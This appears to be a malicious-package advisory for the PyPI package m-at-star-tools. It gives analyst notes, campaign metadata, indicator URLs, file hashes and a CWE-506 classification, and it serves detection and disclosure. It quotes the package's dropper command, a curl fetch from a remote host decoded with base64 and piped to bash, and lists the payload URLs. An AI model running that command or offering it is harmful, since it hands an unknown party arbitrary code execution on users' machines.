-= Per source details. Do not edit below this line.=-
The package's sole console_script m0scan (m0scan/main.py:6-7) executes curl -sL https://mspy.qzz.io/M0scan | base64 -d | bash, fetching an opaque base64-encoded shell payload from a dynamic-DNS-style host (mspy.qzz.io) unrelated to any publisher infrastructure and piping it directly to bash. The fetch is unpinned, unverified (no hash, no signature), obfuscated (base64), and points at a mutable URL — whoever controls mspy.qzz.io/M0scan controls arbitrary code execution on every user who runs the tool. Package metadata is throwaway: author M-AT-STAR, generic GitHub homepage, 5-byte README, no email or license. The package self-describes as an 'M0scan installation wrapper' — the wrapper IS the dropper. Any invocation of the documented CLI yields full attacker code execution on the installer's machine.
The package downloads remote encoded code, which then downloads the next encrypted stage. The encryption of final data requires knowing a code.
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-05-m-at-star-tools
Reasons (based on the campaign):
Downloads and executes a remote malicious script.
obfuscation
{
"malicious-packages-origins": [
{
"versions": [
"1.0.4"
],
"sha256": "2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2",
"modified_time": "2026-05-26T10:43:03Z",
"source": "amazon-inspector",
"import_time": "2026-05-26T13:32:46.10000306Z",
"id": "IN-MAL-2026-004898"
},
{
"versions": [
"1.0.0",
"1.0.3",
"1.0.4"
],
"sha256": "1c1aca876bca2f4006ca7cad627f7eb20efcd63e7d9706852e1740d4c0d66dc1",
"modified_time": "2026-05-26T22:36:40.683327Z",
"source": "kam193",
"import_time": "2026-05-26T22:55:24.733407763Z",
"id": "pypi/2026-05-m-at-star-tools/m-at-star-tools"
}
],
"iocs": {
"urls": [
"https://raw.githubusercontent.com/M-AT-STAR/run/main/tspynstll_m0.nstll",
"https://mspy.qzz.io/M0scan",
"https://raw.githubusercontent.com/M-AT-STAR/run/main/c_stp_m0.enc",
"https://raw.githubusercontent.com/M-AT-STAR/run/main/M0scan.tspy"
]
}
}{
"package_integrity": [
{
"filename": "m_at_star_tools-1.0.4-py3-none-any.whl",
"hashes": {
"sha256": "e4b1029b090a2f5e83098519a58b83a77ced0f228fe77a93fec928dfffa4ce3e",
"md5": "e596ae1287baa87c7dc4950483ef0a26",
"blake2b_256": "2fdf8f9f96a1efcf3d000faf15d4a554556f77cd7c030e1a0cf7e01f029fc16a"
}
},
{
"filename": "m_at_star_tools-1.0.4.tar.gz",
"hashes": {
"sha256": "3d5426e74f8d1b6d608a481bad70b562336b77aba121dcac289d5690befba25a",
"md5": "b95a8631d1acdeac368fb954f65ce8b1",
"blake2b_256": "9a83a24d3a23eb0e22d2f620588a780e7dce3003d5e7cc896e5251b9d7254c73"
}
}
],
"evidence_files": [
{
"sha256": "ca9746b26f972a7f8aa2b0a1823d9478ce1ca35f65f7fc41bebb125768716f11",
"path": "m0scan/main.py",
"tlsh": "ecd097db05592060594183c40208a6d082382e1f1b90322ab3247aaa1f224ba42d08a2"
},
{
"sha256": "78f01d2cb0943fab9d5a8d05bed9fcb2caaf90b6259899e9512bb536abf04367",
"path": "PKG-INFO",
"tlsh": "ced022207330e0363ec30b8d40793ab0f6f912106ac1202bc4e2dee1c30aa0823d2130"
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/m-at-star-tools/MAL-2026-4812.json"
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]